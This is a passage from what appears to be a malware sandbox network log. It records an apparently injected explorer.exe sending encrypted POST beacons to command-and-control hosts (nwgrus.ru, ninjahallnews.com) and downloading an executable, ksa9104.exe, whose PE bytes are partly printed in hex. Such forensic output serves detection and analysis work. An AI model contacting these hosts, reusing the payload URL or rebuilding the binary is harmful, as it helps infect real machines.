    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vu!>_cbjOn^c$N:yayKE/Xq|FB)WJc^T.JGyP^B?a<cZc1e)Mociz*[g"BJ3
Oct 8, 2024 18:26:17.379561901 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:26:17 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 61466 | 190.249.249.14 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:26:35.191060066 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://muicqrvubdhbsy.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 317
    Host: nwgrus.ru
Oct 8, 2024 18:26:35.191082001 CEST | 317 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 25 de 88
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vuG%S"b|Jcw3=]J=|SccJ^OF_[&!fDn}V9\:]V96lW` Ogg=$e
Oct 8, 2024 18:26:36.768918991 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:26:36 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r
Oct 8, 2024 18:26:36.769020081 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:26:36 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r
Oct 8, 2024 18:26:37.025470018 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:26:36 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 61469 | 190.249.249.148 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:26:54.070030928 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://xfevllovssfdblv.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 180
    Host: nwgrus.ru
Oct 8, 2024 18:26:54.070061922 CEST | 180 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 49 d5 bd
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vuQI|7ORgaFJF:Z;;I}2@Cm?HFU:R<zLo'!`
Oct 8, 2024 18:26:55.069500923 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:26:54 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 61410 | 23.145.40.164 | 443 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:23:54 UTC | 162 | OUT | GET /ksa9104.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: 23.145.40.164
2024-10-08 16:23:54 UTC | 327 | IN | HTTP/1.1 200 OK
    Date: Tue, 08 Oct 2024 16:23:54 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Last-Modified: Tue, 08 Oct 2024 16:00:03 GMT
    ETag: "38000-623f93af1dd20"
    Accept-Ranges: bytes
    Content-Length: 229376
    Connection: close
    Content-Type: application/x-msdos-program
2024-10-08 16:23:54 UTC | 7865 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 12 7a 9e 94 56 1b f0 c7 56 1b f0 c7 56 1b f0 c7 48 49 74 c7 4f 1b f0 c7 48 49 65 c7 46 1b f0 c7 48 49 73 c7 1b 1b f0 c7 71 dd 8b c7 55 1b f0 c7 56 1b f1 c7 38 1b f0 c7 48 49 7a c7 57 1b f0 c7 48 49 64 c7 57 1b f0 c7 48 49 61 c7 57 1b f0 c7 52 69 63 68 56 1b f0 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 12 dd 51 65 00 00 00 00 00 00 00 00 e0 00 03
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zVVVHItOHIeFHIsqUV8HIzWHIdWHIaWRichVPELQe
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: 04 42 83 e0 08 85 c0 74 05 8a 1f 47 eb c7 80 fb 2d 75 06 83 4d 18 02 eb 05 80 fb 2b 75 03 8a 1f 47 8b 45 14 85 c0 0f 8c 4b 01 00 00 83 f8 01 0f 84 42 01 00 00 83 f8 24 0f 8f 39 01 00 00 85 c0 75 2a 80 fb 30 74 09 c7 45 14 0a 00 00 00 eb 34 8a 07 3c 78 74 0d 3c 58 74 09 c7 45 14 08 00 00 00 eb 21 c7 45 14 10 00 00 00 eb 0a 83 f8 10 75 13 80 fb 30 75 0e 8a 07 3c 78 74 04 3c 58 75 04 47 8a 1f 47 8b b1 c8 00 00 00 b8 ff ff ff ff 33 d2 f7 75 14 0f b6 cb 0f b7 0c 4e f6 c1 04 74 08 0f be cb 83 e9 30 eb 1b f7 c1 03 01 00 00 74 31 8a cb 80 e9 61 80 f9 19 0f be cb 77 03 83 e9 20 83 c1 c9 3b 4d 14 73 19 83 4d 18 08 39 45 fc 72 27 75 04 3b ca 76 21 83 4d 18 04 83 7d 10 00 75 23 8b 45 18 4f a8 08 75 20 83 7d 10 00 74 03 8b 7d 0c 83 65 fc 00 eb 5b 8b 5d fc 0f af 5d 14
    Data Ascii: BtG-uM+uGEKB$9u*0tE4<xt<XtE!Eu0u<xt<XuGG3uNt0t1aw ;MsM9Er'u;v!M}u#EOu }t}e[]]
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: 22 59 89 08 8b f1 eb b5 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec 53 56 8b 75 08 33 db 57 39 5d 14 75 10 3b f3 75 10 39 5d 0c 75 12 33 c0 5f 5e 5b 5d c3 3b f3 74 07 8b 7d 0c 3b fb 77 1b e8 7f cd ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 03 e9 ff ff 83 c4 14 8b c6 eb d5 39 5d 14 75 04 88 1e eb ca 8b 55 10 3b d3 75 04 88 1e eb d1 83 7d 14 ff 8b c6 75 0f 8a 0a 88 08 40 42 3a cb 74 1e 4f 75 f3 eb 19 8a 0a 88 08 40 42 3a cb 74 08 4f 74 05 ff 4d 14 75 ee 39 5d 14 75 02 88 18 3b fb 75 8b 83 7d 14 ff 75 0f 8b 45 0c 6a 50 88 5c 06 ff 58 e9 78 ff ff ff 88 1e e8 05 cd ff ff 6a 22 59 89 08 8b f1 eb 82 cc cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03
    Data Ascii: "Y3_^[]USVu3W9]u;u9]u3_^[];t};wj^0SSSSS9]uU;u}u@B:tOu@B:tOtMu9]u;u}uEjP\Xxj"YL$t$tNu$$~
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: dc 89 75 0c ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 75 1c ff 15 70 61 41 00 8b f8 3b f3 74 07 56 e8 9c d8 ff ff 59 8b c7 8d 65 ec 5f 5e 5b 8b 4d fc 33 cd e8 8f a6 ff ff c9 c3 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 11 c0 ff ff ff 75 24 8d 4d f0 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 16 fe ff ff 83 c4 1c 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 81 01 00 00 ff 76 04 e8 2c d8 ff ff ff 76 08 e8 24 d8 ff ff ff 76 0c e8 1c d8 ff ff ff 76 10 e8 14 d8 ff ff ff 76 14 e8 0c d8 ff ff ff 76 18 e8 04 d8 ff ff ff 36 e8 fd d7 ff ff ff 76 20 e8 f5 d7 ff ff ff 76 24 e8 ed d7 ff ff ff 76 28 e8 e5 d7 ff ff ff 76 2c e8 dd d7 ff ff ff 76 30 e8 d5 d7 ff ff ff 76 34 e8 cd d7 ff ff ff 76 1c e8 c5 d7 ff ff ff 76 38
    Data Ascii: uuuuuupaA;tVYe_^[M3UuMu$Mu uuuuu}tMapUVuv,v$vvvv6v v$v(v,v0v4vv8
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: 7f 3a e5 0e c9 3f b0 53 75 20 ce 8a bf 61 27 8d f0 18 5e 13 62 fc a8 66 86 89 c4 f9 d9 b2 39 9c 4c ba 01 f2 94 94 3d 97 9e b4 96 96 f7 30 13 df a8 53 de b0 7a 90 76 13 a7 ae 77 51 fc 66 ae a0 4a f8 0f 09 16 fb ed 21 fd 3c 7a d6 9c 32 ea f9 e4 e6 38 9d 3b 71 3b 39 34 db 45 3d 4d f9 99 81 4d 40 51 77 34 be 82 07 6b 40 ca 9b 13 37 4e 21 e4 81 05 91 cf 5d 07 b9 04 46 4b 48 56 98 56 4a d5 ed 00 d5 ca 00 15 40 2e 8f 3e d3 ea 5c 82 00 e8 9c 2d bc aa fd ab 04 47 d8 ef 77 dc b4 89 c7 46 fe 7d 12 0f 4e f0 4e d7 cc 96 9d 61 36 79 5d 97 3f 96 8f b3 fa 35 0d 96 5e 92 f1 43 0d 6f 64 47 ed 97 32 b5 49 90 50 71 33 02 84 f0 84 d0 39 1f 2a 95 a5 03 cb 67 c0 56 a8 f3 9f 12 76 ea 73 b2 64 45 25 ed 21 4d 65 72 f8 51 00 5c ff e4 b4 35 8f 60 e4 7f 99 0f 20 31 87 b9 87 27 72 09
    Data Ascii: :?Su a'^bf9L=0SzvwQfJ!<z28;q;94E=MM@Qw4k@7N!]FKHVVJ@.>\-GwF}NNa6y]?5^CodG2IPq39*gVvsdE%!MerQ\5` 1'r
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: 00 79 ab 6a 98 5c cb fa 40 5d 93 68 55 2b 0f a8 22 76 d8 bd 93 95 85 23 89 9f 94 20 ac 2d 95 77 6e c7 f2 ea c5 22 c5 30 f3 bb 72 43 f2 b4 c9 df 06 31 16 a4 d7 5f d6 37 9f 17 e2 c2 27 45 4f 98 c1 45 a3 f9 e1 d4 6e 95 e1 00 6a 6f 4d 77 28 0e a6 64 56 06 fd c6 d3 6a ff 9f bc f0 62 c0 f3 90 dd 37 dc 50 4d 6d cd a8 c8 e4 6a 27 2f 7f ac fc d9 b5 2b 9c 9e 02 20 51 3c c6 9a f9 91 98 c3 d3 91 7d ef 8b c9 47 f5 9a 13 dc de 91 70 39 44 0d 55 16 dc 11 26 0f 92 5e 61 11 c4 1f 00 9b fe 4e 05 a4 c6 3e 6d d4 f0 31 71 b0 3a b7 43 91 f1 be 7d 4f f3 ba b2 6f 78 7e 1e f3 e6 81 7b 85 e4 e3 11 32 8d 42 62 8a d8 19 3c 2b 6e 4e 86 19 42 c7 29 00 67 49 99 1d c3 56 d9 81 d4 8e 2f 66 81 a4 e4 92 38 d6 64 04 a5 69 4a b4 82 e6 7c 98 af a8 70 4b 17 f8 fe 09 c1 35 b1 de 66 3b 74 a2 1d
    Data Ascii: yj\@]hU+"v# -wn"0rC1_7'EOEnjoMw(dVjb7PMmj'/+ Q<}Gp9DU&^aN>m1q:C}Oox~{2Bb<+nNB)gIV/f8diJ|pK5f;t
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: 85 79 11 e1 d8 93 c1 61 e7 41 0a 3d 96 ac 48 97 21 9c f8 b3 92 c6 2b 5d e5 4a 46 95 1d 36 52 a2 47 9b bf d2 4d 73 01 20 f9 aa d5 b9 ab 5e 16 62 8e a7 d1 a7 b6 b6 5d 87 0d 55 c6 ad c9 dd c0 f2 92 27 3c 87 30 ce b3 96 dc d3 c3 f0 04 27 1e 17 1e 63 8c f5 be 45 fc 72 1d 0e 11 d3 f4 b5 f9 b9 cd 6c 07 02 35 1f 8c 92 35 82 47 69 f8 28 41 dd ae 0b 75 14 a5 71 7a 64 7c 61 68 c5 9e a6 76 42 37 5a f7 4a 3d ed d5 78 01 e9 a9 b3 77 6d 26 9f 97 39 1f 0a 75 62 0b 76 59 7a 2a 0a 66 36 b8 2e b0 1f 71 7e 59 41 c6 e8 a3 2f 39 96 c7 87 6e be e8 9c 46 ae 02 82 21 97 de ab 70 d1 d6 ee 2b 81 9e e2 b1 b6 ed d3 d1 08 77 92 aa 2d d8 17 e2 c7 4d 30 0f 27 9c 98 a8 c1 a5 da d6 99 fc 73 56 77 16 82 6a 80 4a e5 19 59 f1 71 c8 de fd 03 b6 3a e0 a1 a5 25 4e 50 10 af d6 1f fc f3 60 a7 ae
    Data Ascii: yaA=H!+]JF6RGMs ^b]U'<0'cErl55Gi(Auqzd|ahvB7ZJ=xwm&9ubvYz*f6.q~YA/9nF!p+w-M0'sVwjJYq:%NP`
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: 6f 2c 0f da bc 2c 78 e0 4a 56 d4 41 b4 b8 55 39 ba 31 4b a2 2f 24 21 1b 39 9e 15 d8 e1 3b 20 df 3e bb 14 87 2a d6 5c f1 e2 35 0d ab d6 a5 8f b9 4f 29 d1 9e 37 2d 6c 33 65 4b 0e 80 c8 ac 06 29 f6 4a 67 9b 77 9e 33 d5 d0 60 8c 67 64 c4 05 2c e4 a6 39 28 83 c4 e7 5a 70 3a 13 e1 d2 e2 c6 15 6a d4 1b 48 e7 4f 05 f3 38 e7 c1 6a 07 66 f8 7e 85 04 c3 ba b2 89 e9 d2 5c 24 1b e7 82 24 b1 11 3e dd ba 10 fb 05 83 95 13 7a 0c ff cf a1 39 81 fe ca d3 09 1e e5 4c 21 16 54 ad 44 a5 e4 24 88 9e e7 aa fc 95 18 c4 d8 dc f6 0c 81 65 50 39 37 42 e4 ee 46 1b 76 6d 4a e5 81 25 aa a7 f5 e6 66 62 30 59 0e cf a2 7d a4 26 54 8a 85 68 ff 59 00 fc 35 68 ea 4d d2 14 aa f1 00 47 51 37 21 7c 8b 14 6d 32 56 fb bd ed 3a 2f a5 58 e7 fe 7c 65 e6 f5 1c 8f f6 bf 4d 3e 8d 44 ed a7 8e 03 a1 58
    Data Ascii: o,,xJVAU91K/$!9; >*\5O)7-l3eK)Jgw3`gd,9(Zp:jHO8jf~\$$>z9L!TD$eP97BFvmJ%fb0Y}&ThY5hMGQ7!|m2V:/X|eM>DX
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: cf 4a 46 76 aa b9 20 60 24 5a 11 1c 8d ec 5d b1 91 0b 20 08 54 35 cc 2d 6b 4e ba 5b 44 11 ad 64 a8 88 64 a4 26 95 00 22 53 09 b4 7e 63 28 d7 1b 9b dc 55 79 58 31 d5 41 1a 7a ed 97 d1 ec 37 3b 46 4e 04 85 7d 2c 8e 62 0d e0 0e dc 84 8c 39 f5 49 7f d5 a3 07 98 71 6d d0 82 cf a8 0c 96 13 aa 33 b1 d5 dc f3 f7 14 38 b7 ef 28 ba 34 5c 21 ac 7f 2d 59 df c3 12 6a 50 13 49 13 ae 5a 0f bb c7 5f 4c 33 6a 82 cc ef d5 ac bf 20 fa a3 ad 7f 77 18 da f2 5a d5 37 11 c5 f5 f6 fa 09 4d cf 65 95 2b 8c 15 01 cd ea d1 8d 4e 83 c3 a4 1f cd 98 96 25 28 47 0a 9d 1a 19 fa 29 49 bc 57 3e 0b 49 ad d5 97 e1 92 52 f9 6d 1f 9e 80 81 d0 6f ae 9f e2 c9 c7 58 72 dd ab a9 2a 8e 51 5e e6 42 5f 02 43 cc ae 44 2a 22 fa 84 62 08 1c 84 2b cf f5 b8 92 7d 64 15 19 18 94 0f 4a 1a c1 5f 19 a2 fe 6d
    Data Ascii: JFv `$Z] T5-kN[Ddd&"S~c(UyX1Az7;FN},b9Iqm38(4\!-YjPIZ_L3j wZ7Me+N%(G)IW>IRmoXr*Q^B_CD*"b+}dJ_m
2024-10-08 16:23:54 UTC | 8000 | IN | Data Raw: 19 36 35 8d cf 4f 29 66 8a 00 4a 86 8d fc 14 77 51 36 12 59 6b 7c 52 22 a7 c7 aa 2c a3 62 31 b2 18 a7 a6 bb 12 01 d7 d5 43 13 83 43 34 03 72 98 04 b9 3f 92 03 bf 52 3c 9a c6 93 d3 b0 1c 38 f1 67 1e 63 b1 fd 0f 6f 00 e4 97 65 94 26 0a 13 67 ed 54 17 32 01 f7 8c e2 ec f7 17 81 03 bb 88 e2 1f aa 37 fa 4d 35 14 b2 23 42 7a 24 ba dc 26 19 df f8 c4 37 1e 7d 5e c0 b4 8d aa a8 ca 2e 34 70 96 cd 66 be 05 ac 7f 54 3a 31 93 3a 23 14 c5 00 30 70 19 5a 51 0b 4d e7 7d 66 77 1f 90 d5 21 dc b8 2c 05 b8 4a 03 1b 2c 18 bb 14 11 b1 c2 44 ca a4 79 d5 97 7e 52 e3 05 c5 e7 d9 11 8b 46 5b 53 ee 3c 3f 81 6c 3a 8d 12 5b c2 de d5 e1 9f 17 71 5a 77 16 ff ec 1a 89 96 13 a4 34 9c 80 a1 8b f2 e7 07 76 69 c0 ed 9d 98 66 5d 45 bd e5 fa 31 f5 41 ca 5c 93 9e 7f bd f1 a8 35 85 62 f1 b6 32
    Data Ascii: 65O)fJwQ6Yk|R",b1CC4r?R<8gcoe&gT27M5#Bz$&7}^.4pfT:1:#0pZQM}fw!,J,Dy~RF[S<?l:[qZw4vif]E1A\5b2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 61433 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:20 UTC | 285 | OUT | POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://vucrathrxdck.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 241
    Host: ninjahallnews.com
2024-10-08 16:24:20 UTC | 241 | OUT | Data Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 6d ba 12 98 a4 fd 0a 22 a8 74 62 87 72 f6 e1 09 03 ce 04 2f 7f cb c7 d4 49 e9 d3 08 5d 92 93 5d 94 48 24 a0 e2 1a 1d 4f 56 0d 07 99 65 be 94 9c 48 de f4 73 14 52 8b 57 3a dd 4d 15 e1 9a f5 d2 26 07 b5 66 da 6a 88 7d 23 8c 1a a8 7b 30 4b 19 74 e8 cb 45 f3 99 77 e5 28 79 8a ca bb 51 da b9 07 b9 ad 8b 8f 32 55 87 be a6 57 18 b1 72 53 ea 08 17 29 9f 23 6a 7a bb 4c 2b 45 d4 8c ce 13 22 a3 e0 23 ef 4a 8b f7 e6 17 3d 7b 23 b8 07 76 55 1c 39 b8 4e f6 92 78 43 39 74 1d ef af 58 35 24 54 be a7
    Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLj4%<m"tbr/I]]H$OVeHsRW:M&fj}#{0KtEw(yQ2UWrS)#jzL+E"#J={#vU9NxC9tX5$T
2024-10-08 16:24:20 UTC | 294 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 08 Oct 2024 16:24:20 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Type: text/html; charset=utf-8
    Connection: close
    Transfer-Encoding: chunked
2024-10-08 16:24:20 UTC | 7898 | IN | Data Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 55 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
    Data Ascii: 1ee6U[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
2024-10-08 16:24:20 UTC | 18 | IN | Data Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c
    Data Ascii: JMQF 82
2024-10-08 16:24:20 UTC | 2 | IN | Data Raw: 0d 0a
    Data Ascii:
2024-10-08 16:24:20 UTC | 8192 | IN | Data Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f
    Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
2024-10-08 16:24:20 UTC | 6 | IN | Data Raw: 97 20 09 6c 1a f8
    Data Ascii: l
2024-10-08 16:24:20 UTC | 2 | IN | Data Raw: 0d 0a
    Data Ascii:
2024-10-08 16:24:20 UTC | 8192 | IN | Data Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5
    Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
2024-10-08 16:24:20 UTC | 6 | IN | Data Raw: 60 4f 16 27 c7 be
    Data Ascii: `O'
2024-10-08 16:24:20 UTC | 2 | IN | Data Raw: 0d 0a
    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 61434 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:21 UTC | 286 | OUT | POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://krpqgyauqofjy.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 368
    Host: ninjahallnews.com
2024-10-08 16:24:21 UTC | 368 | OUT | Data Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 76 b8 12 e8 a4 bf 56 5b dd 7d 62 a0 21 ff f9 39 2e df 1a 28 51 94 b1 f5 4f be ae 58 0e e5 87 3f bf 62 3a 93 c0 0f 1b 3b 1b 22 0d d9 69 ca e3 c6 4c 8a 99 43 37 52 a2 6e 59 db 41 0a e4 db e8 d4 26 0c 99 62 ac 6a ba 6c 3f c8 1f d2 2d 43 40 1d 70 e7 d9 63 fb aa 01 85 12 60 95 c9 c5 08 d5 8f 00 bd d3 92 97 51 38 c8 c4 df 08 4d b0 68 55 84 06 5b 49 a5 5b 13 46 e9 42 01 12 9f 8b 8c 14 47 b7 ea 73 80 4d 98 f0 b8 13 35 16 4e d9 40 69 5b 1c 07 a7 2f ee c3 6a 5f 12 59 5e e6 fe 64 2b 5e 26 b1 eb e6 58 88 ea 2c e4 37 df 87 a4 da 58 c2 77
    Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lj4%<vV[}b!9.(QOX?b:;"iLC7RnYA&bjl?-C@pc`Q8MhU[I[FBGsM5N@i[/j_Y^d+^&X,7Xw
2024-10-08 16:24:22 UTC | 278 | IN | HTTP/1.1 200 OK
    Date: Tue, 08 Oct 2024 16:24:21 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Length: 0
    Content-Type: text/html; charset=utf-8
